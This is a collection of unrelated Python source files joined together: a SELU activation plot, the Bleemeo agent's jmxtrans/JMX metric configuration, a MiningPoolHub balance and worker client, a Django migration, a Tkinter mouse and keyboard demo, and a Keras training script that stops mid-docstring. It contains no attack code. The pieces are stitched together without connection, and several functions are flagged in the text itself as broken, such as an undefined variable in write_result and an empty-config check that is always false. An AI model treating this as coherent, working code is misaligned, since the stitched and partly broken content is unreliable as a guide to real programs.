# Plot the SELU activation over the interval [-5, 5).
x = np.arange(-5, 5, 0.1)
# selu() is written for scalars, so apply it element-wise.
y = [selu(i) for i in x]
print(x)
print(y)
plt.plot(x, y)
plt.grid()
plt.show()
#### 과제
# elu, selu, reakly_relu
# 72_2, 3, 4 |
#
# Copyright 2017 Bleemeo
#
# bleemeo.com an infrastructure monitoring solution in the Cloud
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import json
import logging
import os
import time
import bleemeo_agent.type
import bleemeo_agent.util
JMX_METRICS = {
'java': [
{
'name': 'jvm_heap_used',
'mbean': 'java.lang:type=Memory',
'attribute': 'HeapMemoryUsage',
'path': 'used',
},
{
'name': 'jvm_non_heap_used',
'mbean': 'java.lang:type=Memory',
'attribute': 'NonHeapMemoryUsage',
'path': 'used',
},
{
'name': 'jvm_gc',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionCount',
'derive': True,
'sum': True,
'typeNames': ['name'],
},
{
'name': 'jvm_gc_time',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionTime',
'derive': True,
'sum': True,
'typeNames': ['name'],
},
{
'name': 'jvm_gc_utilization',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionTime',
'derive': True,
'sum': True,
'typeNames': ['name'],
'scale': 0.1, # time is in ms/s. Convert in %
},
],
'bitbucket': [
{
'name': 'events',
'mbean':
'com.atlassian.bitbucket.thread-pools:name=EventThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'io_tasks',
'mbean':
'com.atlassian.bitbucket.thread-pools:name=IoPumpThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'tasks',
'mbean':
'com.atlassian.bitbucket.thread-pools'
':name=ScheduledThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'pulls',
'mbean': 'com.atlassian.bitbucket:name=ScmStatistics',
'attribute': 'Pulls',
'derive': True,
},
{
'name': 'pushes',
'mbean': 'com.atlassian.bitbucket:name=ScmStatistics',
'attribute': 'Pushes',
'derive': True,
},
{
'name': 'queued_scm_clients',
'mbean': 'com.atlassian.bitbucket:name=HostingTickets',
'attribute': 'QueuedRequests',
},
{
'name': 'queued_scm_commands',
'mbean': 'com.atlassian.bitbucket:name=CommandTickets',
'attribute': 'QueuedRequests',
},
{
'name': 'queued_events',
'mbean': 'com.atlassian.bitbucket:name=EventStatistics',
'attribute': 'QueueLength',
},
{
'name': 'ssh_connections',
'mbean': 'com.atlassian.bitbucket:name=SshSessions',
'attribute': 'SessionCreatedCount',
'derive': True,
},
{
'name': 'requests',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
{
'name': 'requests',
'mbean': 'Tomcat:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Tomcat:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
'cassandra': [
{
'name': 'read_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Read,name=Latency',
'attribute': 'Count',
'derive': True,
},
{
'name': 'read_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Read,name=TotalLatency',
'attribute': 'Count',
'scale': 0.001, # convert from microsecond to millisecond
'derive': True,
},
{
'name': 'write_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Write,name=Latency',
'attribute': 'Count',
'derive': True,
},
{
'name': 'write_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Write,name=TotalLatency',
'attribute': 'Count',
'scale': 0.001, # convert from microsecond to millisecond
'derive': True,
},
{
'name': 'bloom_filter_false_ratio',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,name=BloomFilterFalseRatio',
'attribute': 'Value',
'scale': 100, # convert from ratio (0 to 1) to percent
},
{
'name': 'sstable',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,name=LiveSSTableCount',
'attribute': 'Value',
},
],
'confluence': [
{
'name': 'last_index_time',
'mbean': 'Confluence:name=IndexingStatistics',
'attribute': 'LastElapsedMilliseconds',
},
{
'name': 'queued_index_tasks',
'mbean': 'Confluence:name=IndexingStatistics',
'attribute': 'TaskQueueLength',
},
{
'name': 'db_query_time',
'mbean': 'Confluence:name=SystemInformation',
'attribute': 'DatabaseExampleLatency',
},
{
'name': 'queued_mails',
'mbean': 'Confluence:name=MailTaskQueue',
'attribute': 'TasksSize',
},
{
'name': 'queued_error_mails',
'mbean': 'Confluence:name=MailTaskQueue',
'attribute': 'ErrorQueueSize',
},
{
'name': 'requests',
'mbean': 'Standalone:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Standalone:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
'jira': [
{
'name': 'requests',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
}
CASSANDRA_JMX_DETAILED_TABLE = [
{
'name': 'bloom_filter_false_ratio',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=BloomFilterFalseRatio',
'attribute': 'Value',
'typeNames': ['keyspace', 'scope'],
'scale': 100, # convert from ratio (0 to 1) to percent
},
{
'name': 'sstable',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=LiveSSTableCount',
'attribute': 'Value',
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'read_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=ReadTotalLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'read_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=ReadLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'write_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=WriteTotalLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'write_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=WriteLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
]
def update_discovery(core):
    """Regenerate and write the jmxtrans configuration after discovery.

    Delegates to the module-level ``_CURRENT_CONFIG``; any failure is
    logged and swallowed so the agent keeps running with whatever
    jmxtrans configuration is currently on disk.
    """
    try:
        _CURRENT_CONFIG.write_config(core)
    except Exception: # pylint: disable=broad-except
        logging.warning(
            'Failed to write jmxtrans configuration. '
            'Continuing with current configuration'
        )
        # Full traceback only at debug level to avoid noisy warnings.
        logging.debug('exception is:', exc_info=True)
class Jmxtrans:
    """ Configure and process graphite data from jmxtrans
    """
    # pylint: disable=too-many-instance-attributes
    def __init__(self, graphite_client):
        # graphite_client is the listener feeding us decoded graphite lines;
        # its ``core`` is the agent object used to emit metric points.
        self.core = graphite_client.core
        self.graphite_client = graphite_client
        self.last_timestamp = 0
        # used to compute derivated values
        self._raw_value = {}
        # (name, instance, service) -> (jmx_metric, [values]) awaiting summation
        self._sum_value = {}
        # (name, instance, service) -> (jmx_metric, value) awaiting its divisor
        self._ratio_value = {}
        # (name, item) -> (timestamp, value): cached divisor values for ratios
        self._values_cache = {}
        # NOTE(review): duplicate of the last_timestamp assignment above.
        self.last_timestamp = 0
        self.last_purge = bleemeo_agent.util.get_clock()

    def close(self):
        # Flush any pending sum/ratio metrics before shutdown.
        self.flush(self.last_timestamp)

    def emit_metric(self, name, timestamp, value):
        """Process one graphite data point produced by jmxtrans.

        Decodes the hashed metric name back to (service, mbean, attribute),
        applies derive/scale transformations, and either emits the point
        immediately or accumulates it for flush() (sum/ratio metrics).
        """
        # pylint: disable=too-many-locals
        # pylint: disable=too-many-branches
        # pylint: disable=too-many-statements
        # A timestamp jump (> 1s) means jmxtrans started a new collection
        # round: flush the sums/ratios accumulated for the previous round.
        if abs(timestamp - self.last_timestamp) > 1:
            self.flush(self.last_timestamp)
        self.last_timestamp = timestamp
        clock = bleemeo_agent.util.get_clock()
        # Drop stale cached values at most once per minute.
        if clock - self.last_purge > 60:
            self.purge_metrics()
            self.last_purge = clock
        # Example of name: jmxtrans.f5[...]d6.20[...]7b.HeapMemoryUsage_used
        part = name.split('.')
        if len(part) == 4:
            (_, md5_service, md5_mbean, attr) = part
            type_names = None
        elif len(part) == 5:
            # 5 parts when the query used typeNames (e.g. per-GC metrics).
            (_, md5_service, md5_mbean, type_names, attr) = part
        else:
            logging.debug(
                'Unexpected number of part for jmxtrans metrics: %s',
                name,
            )
            return
        try:
            (service_name, instance) = _CURRENT_CONFIG.to_service[md5_service]
        except KeyError:
            logging.debug('Service not found for %s', name)
            return
        metric_key = (md5_service, md5_mbean, attr)
        try:
            jmx_metrics = _CURRENT_CONFIG.to_metric[metric_key]
        except KeyError:
            # Attribute not declared in the current configuration: ignore.
            return
        for jmx_metric in jmx_metrics:
            new_name = '%s_%s' % (service_name, jmx_metric['name'])
            # The metric "item" combines the service instance and the mbean
            # type name (e.g. the GC name) when both are present.
            if instance is not None and type_names is not None:
                item = instance + '_' + type_names
            elif type_names is not None:
                item = type_names
            else:
                item = instance
            if jmx_metric.get('derive'):
                # Counters are converted to a per-second rate.
                new_value = self.get_derivate(
                    new_name, item, timestamp, value
                )
                if new_value is None:
                    # First sample of a counter: no rate yet.
                    continue
            else:
                new_value = value
            labels = {}
            if item:
                labels['item'] = item
            if jmx_metric.get('scale'):
                new_value = new_value * jmx_metric['scale']
            metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
                label=new_name,
                labels=labels,
                time=timestamp,
                value=new_value,
                service_label=service_name,
                service_instance=instance,
            )
            if jmx_metric.get('sum', False):
                # Summed metrics drop the type-name part of the item and are
                # accumulated until flush(); metric_point is discarded here.
                item = instance
                self._sum_value.setdefault(
                    (new_name, instance, service_name), (jmx_metric, [])
                )[1].append(new_value)
                continue
            elif jmx_metric.get('ratio') is not None:
                # Ratio metrics wait for their divisor; emitted by flush().
                key = (new_name, instance, service_name)
                self._ratio_value[key] = (jmx_metric, new_value)
                continue
            if new_name in _CURRENT_CONFIG.divisors:
                # Remember values that act as the divisor of a ratio metric.
                self._values_cache[(new_name, item)] = (timestamp, new_value)
            self.core.emit_metric(metric_point)

    def packet_finish(self):
        """ Called when graphite_client finished processing one TCP packet
        """

    def flush(self, timestamp):
        """Emit the sum/ratio metrics accumulated for one collection round."""
        for key, (jmx_metric, values) in self._sum_value.items():
            (name, item, service_name) = key
            labels = {}
            if item:
                labels['item'] = item
            metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
                label=name,
                labels=labels,
                time=timestamp,
                value=sum(values),
                service_label=service_name,
                service_instance=item,
            )
            if jmx_metric.get('ratio') is not None:
                # A summed ratio numerator still needs its divisor (below).
                self._ratio_value[key] = (jmx_metric, sum(values))
            else:
                if name in _CURRENT_CONFIG.divisors:
                    self._values_cache[(name, item)] = (timestamp, sum(values))
                self.core.emit_metric(metric_point)
        self._sum_value = {}
        for key, (jmx_metric, value) in self._ratio_value.items():
            (name, item, service_name) = key
            divisor_name = "%s_%s" % (service_name, jmx_metric['ratio'])
            divisor = self._values_cache.get((divisor_name, item))
            new_value = None
            # The divisor must come from the same collection round (+/- 1s).
            if divisor is None or abs(divisor[0] - timestamp) > 1:
                logging.debug(
                    'Failed to compute ratio metric %s (%s) at time %s',
                    name,
                    item,
                    timestamp,
                )
            elif divisor[1] == 0:
                # Avoid division by zero: report 0 instead.
                new_value = 0.0
            else:
                new_value = value / divisor[1]
            labels = {}
            if item:
                labels['item'] = item
            if new_value is not None:
                metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
                    label=name,
                    labels=labels,
                    time=timestamp,
                    value=new_value,
                    service_label=service_name,
                    service_instance=item,
                )
                self.core.emit_metric(metric_point)
        self._ratio_value = {}

    def get_derivate(self, name, item, timestamp, value):
        """ Return derivate of a COUNTER (e.g. something that only goes upward)
        """
        # self.lock is acquired by caller
        (old_timestamp, old_value) = self._raw_value.get(
            (name, item), (None, None)
        )
        self._raw_value[(name, item)] = (timestamp, value)
        if old_timestamp is None:
            # First sample: no previous point to derive against.
            return None
        delta = value - old_value
        delta_time = timestamp - old_timestamp
        if delta_time == 0:
            return None
        if delta < 0:
            # Counter reset (e.g. service restart): skip this sample.
            return None
        return delta / delta_time

    def purge_metrics(self):
        """ Remove old metrics from self._raw_value
        """
        # NOTE(review): cutoff uses wall-clock time.time() while the stored
        # timestamps come from graphite data — presumably both are epoch
        # seconds; confirm against the jmxtrans output format.
        now = time.time()
        cutoff = now - 60 * 6
        self._raw_value = {
            key: (timestamp, value)
            for key, (timestamp, value) in self._raw_value.items()
            if timestamp >= cutoff
        }
        self._values_cache = {
            key: (timestamp, value)
            for key, (timestamp, value) in self._values_cache.items()
            if timestamp >= cutoff
        }
class JmxConfig:
    """Build and persist the jmxtrans JSON configuration.

    Also keeps the reverse-lookup tables (MD5 alias -> service / metric)
    that Jmxtrans.emit_metric uses to decode incoming graphite names.
    """

    def __init__(self, core):
        self.core = core
        # map md5_service to (service_name, instance)
        self.to_service = {}
        # map (md5_service, md5_bean, attr) to a list of jmx_metrics
        self.to_metric = {}
        # list of divisor for a ratio
        self.divisors = set()

    def get_jmxtrans_config(self, empty=False):
        """Return the jmxtrans configuration as a JSON string.

        When ``empty`` is true, return a configuration with no servers.
        As a side effect, rebuilds to_service / to_metric / divisors.
        """
        # pylint: disable=too-many-locals
        # pylint: disable=too-many-branches
        config = {
            'servers': []
        }
        to_service = {}
        to_metric = {}
        divisors = set()
        if empty:
            return json.dumps(config)
        # Writer that sends results back to this agent's graphite listener.
        output_config = {
            "@class":
                "com.googlecode.jmxtrans.model.output.GraphiteWriterFactory",
            "rootPrefix": "jmxtrans",
            "port": self.core.config['graphite.listener.port'],
            "host": self.core.config['graphite.listener.address'],
            "flushStrategy": "timeBased",
            "flushDelayInSeconds": self.core.metric_resolution,
        }
        # jmxtrans cannot send to the wildcard address; use loopback instead.
        if output_config['host'] == '0.0.0.0':
            output_config['host'] = '127.0.0.1'
        # sorted() makes the generated JSON deterministic across runs.
        for (key, service_info) in sorted(self.core.services.items()):
            if not service_info.get('active', True):
                continue
            (service_name, instance) = key
            if service_info.get('address') is None and instance:
                # Address is None if this check is associated with a stopped
                # container. In such case, no metrics could be gathered.
                continue
            if 'jmx_port' in service_info and 'address' in service_info:
                jmx_port = service_info['jmx_port']
                # Alias each service by MD5(service_name + instance) so the
                # graphite metric names stay short and unambiguous.
                md5_service = hashlib.md5(service_name.encode('utf-8'))
                if instance is not None:
                    md5_service.update(instance.encode('utf-8'))
                md5_service = md5_service.hexdigest()
                to_service[md5_service] = (service_name, instance)
                server = {
                    'host': service_info['address'],
                    'alias': md5_service,
                    'port': jmx_port,
                    'queries': [],
                    'outputWriters': [output_config],
                    'runPeriodSeconds': self.core.metric_resolution,
                }
                if 'jmx_username' in service_info:
                    server['username'] = service_info['jmx_username']
                    server['password'] = service_info['jmx_password']
                jmx_metrics = _get_jmx_metrics(service_name, service_info)
                for jmx_metric in jmx_metrics:
                    # Attribute key matches the name jmxtrans will report
                    # (attribute, optionally suffixed with the JSON path).
                    if 'path' in jmx_metric:
                        attr = '%s_%s' % (
                            jmx_metric['attribute'], jmx_metric['path'],
                        )
                    else:
                        attr = jmx_metric['attribute']
                    md5_mbean = hashlib.md5(
                        jmx_metric['mbean'].encode('utf-8')
                    ).hexdigest()
                    metric_key = (md5_service, md5_mbean, attr)
                    to_metric.setdefault(metric_key, []).append(jmx_metric)
                    if 'ratio' in jmx_metric:
                        divisors.add(
                            "%s_%s" % (service_name, jmx_metric['ratio'])
                        )
                    query = {
                        "obj": jmx_metric['mbean'],
                        "outputWriters": [],
                        "resultAlias": md5_mbean,
                    }
                    query['attr'] = [jmx_metric['attribute']]
                    if 'typeNames' in jmx_metric:
                        query['typeNames'] = jmx_metric['typeNames']
                    server['queries'].append(query)
                config['servers'].append(server)
        self.to_metric = to_metric
        self.to_service = to_service
        self.divisors = divisors
        # sort_keys keeps the output stable so write_config() can compare
        # it byte-for-byte with the file already on disk.
        return json.dumps(config, sort_keys=True)

    def write_config(self, core):
        """Write the generated configuration to the jmxtrans config file.

        Skips the write when the file already holds the same content, and
        creates the file with 0600 permissions because it may contain JMX
        passwords.
        """
        if self.core is None:
            self.core = core
        config = self.get_jmxtrans_config()
        config_path = self.core.config['jmxtrans.config_file']
        if os.path.exists(config_path):
            with open(config_path) as config_file:
                current_content = config_file.read()
            if config == current_content:
                logging.debug('jmxtrans already configured')
                return
        # NOTE(review): get_jmxtrans_config(empty=True) returns
        # '{"servers": []}', never '{}', so this chained comparison looks
        # permanently false — confirm the intended "empty config" check.
        if (config == '{}' == self.get_jmxtrans_config(empty=True)
                and not os.path.exists(config_path)):
            logging.debug(
                'jmxtrans generated config would be empty, skip writing it'
            )
            return
        # Don't simply use open. This file must have limited permission
        # since it may contains password
        open_flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC
        try:
            fileno = os.open(config_path, open_flags, 0o600)
        except OSError:
            if not os.path.exists(config_path):
                # Missing target file means the jmx add-on is not installed;
                # this is a supported configuration, not an error.
                logging.debug(
                    'Failed to write jmxtrans configuration.'
                    ' Target file does not exists,'
                    ' bleemeo-agent-jmx is installed ?'
                )
                return
            raise
        with os.fdopen(fileno, 'w') as config_file:
            config_file.write(config)
def _get_jmx_metrics(service_name, service_info):
    """Assemble the JMX metric definitions for one discovered service.

    Combines (in order) the service's own ``jmx_metrics`` overrides, the
    generic JVM metrics, the per-service defaults from JMX_METRICS, and —
    for Cassandra — one expanded copy of CASSANDRA_JMX_DETAILED_TABLE per
    ``keyspace.table`` entry in ``cassandra_detailed_tables``.
    """
    metrics = list(service_info.get('jmx_metrics', []))
    metrics += JMX_METRICS['java']
    metrics += JMX_METRICS.get(service_name, [])
    if service_name == 'cassandra':
        for full_name in service_info.get('cassandra_detailed_tables', []):
            # Entries must be of the form "keyspace.table"; skip anything else.
            if '.' not in full_name:
                continue
            keyspace, table = full_name.split('.', 1)
            # Copy each template entry with its mbean pattern instantiated
            # for this keyspace/table pair.
            metrics.extend(
                dict(entry, mbean=entry['mbean'].format(
                    keyspace=keyspace, table=table,
                ))
                for entry in CASSANDRA_JMX_DETAILED_TABLE
            )
    return metrics
_CURRENT_CONFIG = JmxConfig(None)
|
import requests
class MiningPoolHub:
    """Thin client for the MiningPoolHub web API (balances and workers)."""

    def balance(self, config, coins):
        """Return the total balance across all coins, valued via coin prices.

        config -- dict holding the API 'key'.
        coins  -- mapping of coin symbol to info dicts containing 'price'.
        Returns the total, or None when the API call fails (non-200),
        matching the original behavior.
        """
        response = requests.get('https://miningpoolhub.com/index.php?page=api&action=getuserallbalances&api_key=' + config['key'])
        if response.status_code == 200:
            data = response.json()
            balances = data['getuserallbalances']['data']
            total = 0
            for balance in balances:
                cur = balance['coin']
                # Fix: the original local was named ``sum``, shadowing the builtin.
                coin_total = self.__all(balance)
                rate = coins[cur]['price']
                total += coin_total * rate
            return total

    def __all(self, coin):
        """Sum every balance bucket of one coin entry."""
        # Idiom: sum() over the fixed bucket keys instead of manual accumulation.
        return sum(coin[key] for key in (
            'confirmed', 'unconfirmed',
            'ae_confirmed', 'ae_unconfirmed', 'exchange',
        ))

    def workers(self, config, coins):
        """Return active workers aggregated by (worker name, algorithm).

        Queries each coin's pool endpoint; workers with zero hashrate are
        skipped. Rates for the same name+algo across coins are summed.
        """
        mphkey = config['key']
        workers = {}
        # Only the coin info dicts are used; the mapping key is not needed.
        for coin in coins.values():
            response = requests.get('https://' + coin['name'] + '.miningpoolhub.com/index.php?page=api&action=getuserworkers&api_key=' + mphkey)
            if response.status_code == 200:
                data = response.json()
                for worker in data['getuserworkers']['data']:
                    if worker != 'error':
                        hashrate = worker['hashrate']
                        if hashrate > 0:
                            # username is "<account>.<worker>"; keep the worker part.
                            name = worker['username'].split('.')[1]
                            algo = coin['algo']
                            key = name + '_' + algo
                            # Fix: 'not key in workers' -> idiomatic 'not in'.
                            if key not in workers:
                                workers[key] = {
                                    'miner': None,
                                    'name': name,
                                    'algo': algo,
                                    'rate': 0
                                }
                            workers[key]['rate'] += hashrate
        return workers.values()
|
# Generated by Django 3.2 on 2021-05-16 08:22
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add range/fire-rate fields to ``gun`` and a birth date to ``solider``."""

    dependencies = [
        # Must run after the previous auto-generated army_app migration.
        ('army_app', '0003_auto_20210515_2217'),
    ]
    operations = [
        migrations.AddField(
            model_name='gun',
            name='active_range',
            # NOTE(review): the default is the string '200' on a FloatField;
            # Django coerces it, but numeric defaults (200.0) would be the
            # conventional form. Do not edit if this migration was applied.
            field=models.FloatField(default='200', help_text='Zadej aktivni dostrel.'),
        ),
        migrations.AddField(
            model_name='gun',
            name='fire_rate',
            # NOTE(review): string default on a FloatField, see above.
            field=models.FloatField(default='300', help_text='Zadejte kadenci zbrane.'),
        ),
        migrations.AddField(
            model_name='gun',
            name='max_range',
            # NOTE(review): string default on a FloatField, see above.
            field=models.FloatField(default='1000', help_text='Zadej maximalni dostrel.'),
        ),
        migrations.AddField(
            model_name='solider',
            name='date_of_birth',
            field=models.DateField(default='1991-01-01', help_text='Zadej datum narezeni'),
        ),
    ]
|
#!/usr/bin/python3
from tkinter import *
class application(Frame):
    """Tkinter demo: a canvas that reports mouse events, draws circles
    while dragging, and reports keyboard events.
    """

    def __init__(self, master):
        super().__init__(master)
        self.master = master
        self.pack()
        self.createWidget()

    def createWidget(self):
        """Create the canvas and register the mouse/keyboard handlers."""
        self.canvas = Canvas(
            self, width=200, height=200, bg='white')
        self.canvas.pack()
        self.canvas.bind('<Button-1>', self.mouseTest)
        self.canvas.bind('<B1-Motion>', self.test_drag)
        self.canvas.bind('<KeyPress>', self.keyboard_test)
        self.canvas.bind('<KeyPress-a>', self.press_a_test)
        # Fix: event sequences must be wrapped in angle brackets; the
        # original 'KeyRelease-a' never bound the intended release event.
        self.canvas.bind('<KeyRelease-a>', self.release_a_test)
        # Fix: a Canvas only receives key events when it has keyboard
        # focus, so the <KeyPress*> bindings above could never fire.
        self.canvas.focus_set()

    def mouseTest(self, event):
        """Print click position (widget-relative, then screen-relative)."""
        print('{0},{1}'.format(event.x, event.y))
        print('{0},{1}'.format(event.x_root, event.y_root))
        print('{0}'.format(event.widget))

    def test_drag(self, event):
        """Draw a small circle at the pointer while dragging with button 1."""
        self.canvas.create_oval(event.x, event.y, event.x + 10, event.y + 10)

    def keyboard_test(self, event):
        """Print the keycode, character and keysym of any key press."""
        print('keycode:{0},char:{1},keysym:{2}'.format(event.keycode, event.char, event.keysym))

    def press_a_test(self, event):
        print('press a')

    # Fix: Tkinter invokes bound handlers with an event argument; the
    # original signature (self only) raised TypeError when 'a' was released.
    def release_a_test(self, event):
        print('release a')
if __name__ == '__main__':
    # Build the root window (200x200 pixels) and start the Tk event loop.
    root = Tk()
    root.geometry('200x200')
    app=application(root)
    root.mainloop()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 15:11:45 2019
@author: 于福波
"""
from keras import Sequential
from keras.layers.core import Dense,Activation,Dropout
from keras import optimizers
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm,trange
def write_result(t):
    """Dump the current run's training history, correlations, scores and
    observed/predicted series into the module-level Excel `writer`, offsetting
    the columns by the run index `t` so repeated runs land side by side.

    Reads module-level globals: train, colnames, writer, score, y_test,
    y_train, y_train_pred (and, dynamically, r_test_*/r_train_* names).

    NOTE(review): `y_pred` is never assigned in this module (the CV loop
    creates `y_test_pred`), and no `r_test_<name>`/`r_train_<name>` globals
    are created here either — calling this as written raises NameError /
    KeyError; confirm those names are defined elsewhere before use.
    """
    pd.DataFrame(train.history).to_excel(writer,startcol=5*t,sheet_name='loss&mae')
    # Correlation matrices are looked up by dynamically-built global names.
    pd.DataFrame(globals()['r_test_'+colnames[0]]).to_excel(writer,startcol=13*t,sheet_name='cor&score')
    pd.DataFrame(globals()['r_test_'+colnames[1]]).to_excel(writer,startcol=13*t+3,sheet_name='cor&score')
    pd.DataFrame(globals()['r_train_'+colnames[0]]).to_excel(writer,startcol=13*t+6,sheet_name='cor&score')
    pd.DataFrame(globals()['r_train_'+colnames[1]]).to_excel(writer,startcol=13*t+9,sheet_name='cor&score')
    pd.DataFrame(score).to_excel(writer,startcol=3*t,sheet_name='score')
    # Side-by-side observed vs. predicted values for both targets; indices are
    # reset so the split rows align positionally with the prediction arrays.
    pred_obv=pd.DataFrame({'y_test_'+colnames[0]:y_test[colnames[0]].reset_index(drop=True),
                           'y_test_'+colnames[1]:y_test[colnames[1]].reset_index(drop=True),
                           'y_pred_'+colnames[0]:y_pred[0],
                           'y_pred_'+colnames[1]:y_pred[1],
                           'y_train_'+colnames[0]:y_train[colnames[0]].reset_index(drop=True),
                           'y_train_'+colnames[1]:y_train[colnames[1]].reset_index(drop=True),
                           'y_train_pred_'+colnames[0]:y_train_pred[0],
                           'y_train_pred_'+colnames[1]:y_train_pred[1] })
    pred_obv.to_excel(writer,sheet_name='obv&pre',startcol=t*9)
def scatter_loss_plot():
    """Draw diagnostics for the last training run on a 2x3 subplot grid:
    observed-vs-predicted scatter for test (1) and train (2) on the first
    target, then the loss (4), MAE (5) and validation-loss (6) curves.

    Reads module-level globals: y_test, y_train, y_test_pred, y_train_pred,
    train and colnames; draws onto the current matplotlib figure.
    """
    # Test-set scatter for the first target, axes clipped to [-1, 1].
    plt.subplot(2,3,1)
    plt.ylim(-1,1)
    plt.xlim(-1,1)
    plt.plot(y_test[colnames[0]],y_test_pred[0],'.')
    # Train-set scatter for the first target.
    plt.subplot(2,3,2)
    plt.ylim(-1,1)
    plt.xlim(-1,1)
    plt.plot(y_train[colnames[0]],y_train_pred[0],'.')
    # Training-loss curve over epochs.
    plt.subplot(2,3,4)
    #plt.ylim()
    plt.plot(train.history['loss'],'-')
    # Mean-absolute-error curve over epochs.
    plt.subplot(2,3,5)
    #plt.ylim()
    plt.plot(train.history['mean_absolute_error'],'-')
    # Validation-loss curve over epochs.
    plt.subplot(2,3,6)
    plt.plot(train.history['val_loss'],'-')
def Network_train(opt, Setlr, dlcs, sjsl, nepochs):
    """Compile the global `model` and train it on the global train/test split.

    Args:
        opt: optimizer name — 'Adam', 'sgd' or 'Adagrad' select the locally
             configured optimizers below; any other value is passed through
             to Keras unchanged (backward compatible).
        Setlr: learning rate.
        dlcs: SGD momentum.
        sjsl: learning-rate decay.
        nepochs: number of training epochs.

    Writes module-level globals: `train` (the fit history) and `score`
    (evaluation on the global x_test/y_test).
    """
    global train, score
    # Candidate optimizers built from the supplied hyper-parameters.
    Adam = optimizers.Adam(lr=Setlr, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=sjsl, amsgrad=True)
    sgd = optimizers.SGD(lr=Setlr, momentum=dlcs, decay=sjsl, nesterov=False)
    Adagrad = optimizers.Adagrad(lr=Setlr, epsilon=1e-06)
    # BUG FIX: the original passed the *name string* straight to compile(),
    # so Keras instantiated a default optimizer and Setlr/dlcs/sjsl were
    # silently ignored. Resolve the name to the configured instance instead;
    # unknown names fall through unchanged.
    optimizer = {'Adam': Adam, 'sgd': sgd, 'Adagrad': Adagrad}.get(opt, opt)
    model.compile(loss='mean_squared_error', optimizer=optimizer, metrics=['mae'])
    # 11% of the training data is held out as the validation split.
    train = model.fit(x_train, y_train, validation_split=0.11, epochs=nepochs, batch_size=16, verbose=0)
    score = model.evaluate(x_test, y_test, batch_size=16)
def Set_network(n_hide, n_input):
    """Rebuild the global `model`: a single relu hidden layer of `n_hide`
    units over `n_input` features, 20% dropout, and a one-unit linear output.
    All weights use the 'normal' initializer.
    """
    global model
    model = Sequential()
    hidden = Dense(units=n_hide, input_dim=n_input,
                   kernel_initializer='normal', activation='relu')
    output = Dense(units=1, input_dim=n_hide, kernel_initializer='normal')
    model.add(hidden)
    model.add(Dropout(0.2))
    model.add(output)
def rmse(obs, pre):
    """Return the root-mean-square error between observed and predicted values.

    Computed directly with NumPy (sqrt of the mean squared difference),
    which is numerically identical to the original
